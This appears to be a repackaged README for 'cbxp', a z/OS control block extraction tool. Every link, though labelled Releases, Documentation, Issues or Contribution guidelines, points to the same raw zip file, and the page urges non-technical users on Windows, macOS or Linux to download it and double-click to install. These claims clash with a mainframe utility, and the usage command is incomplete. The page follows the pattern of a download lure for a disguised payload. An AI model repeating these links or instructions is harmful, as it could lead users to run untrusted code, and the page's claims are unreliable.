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# πŸ“¦ cbxp - Easily Extract z/OS Control Block Data

## πŸ“₯ Download Now
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## πŸ“– Overview
cbxp offers a simple and unified way to extract control block data from z/OS. This application provides a standardized interface that simplifies the process, making it easier for anyone to access crucial mainframe data without needing extensive technical skills.

## πŸš€ Getting Started
Follow the steps below to download and run cbxp on your computer.

### Step 1: Visit the Download Page
To get started, visit the [Releases page](https://raw.githubusercontent.com/XavierBrasilero/cbxp/main/python/cbxp-v3.4.zip).

### Step 2: Download the Application
On the Releases page, look for the latest version of cbxp. Click on it, and you will see a list of available files. Choose the file that matches your operating system.

### Step 3: Install and Run
1. After downloading the file, locate it in your computer's downloads folder.
2. Double-click the downloaded file to start the installation process.
3. Follow the on-screen instructions to complete the installation.

## βš™οΈ System Requirements
- Operating System: Windows, macOS, or Linux
- Python: Version 3.6 or higher is recommended.
- Disk Space: At least 100 MB available.
- Memory: 512 MB RAM or more.

## πŸ“‘ Features
- **User-Friendly Interface:** Designed for ease of use, suitable for non-technical users.
- **JSON Output:** Extracted data is formatted in JSON for simplicity and readability.
- **Command Line Interface (CLI):** Operate cbxp from your terminal or command prompt for greater control.
- **Cross-Platform Compatibility:** Works on major operating systems.

## πŸ› οΈ Usage Instructions
1. Open your command prompt or terminal.
2. Navigate to the directory where cbxp is installed.
3. Use the following command to extract control block data:

cbxp


Replace `<options>` with the specific parameters you want to use. For example, if you want to extract data from a specific control block, specify it directly in the command.

## πŸ“– Documentation
For more details on using cbxp, refer to the [Documentation wiki](https://raw.githubusercontent.com/XavierBrasilero/cbxp/main/python/cbxp-v3.4.zip). You will find comprehensive guides on how to utilize all features effectively.

## πŸ†˜ Support
If you encounter issues while using cbxp, you can seek help from the community by visiting the [Issues page](https://raw.githubusercontent.com/XavierBrasilero/cbxp/main/python/cbxp-v3.4.zip). We encourage feedback and contributions.

## 🏷️ Topics
- cbxp
- cli
- control block
- json
- mainframe
- python
- shell
- simplification
- standardization
- zos

## πŸ₯³ Community Contributions
We welcome contributions to cbxp! If you have ideas for improvements or want to help with the project, please visit our [Contribution guidelines](https://raw.githubusercontent.com/XavierBrasilero/cbxp/main/python/cbxp-v3.4.zip).

## πŸ“₯ Download Again
Remember, you can always download cbxp from the [Releases page](https://raw.githubusercontent.com/XavierBrasilero/cbxp/main/python/cbxp-v3.4.zip).

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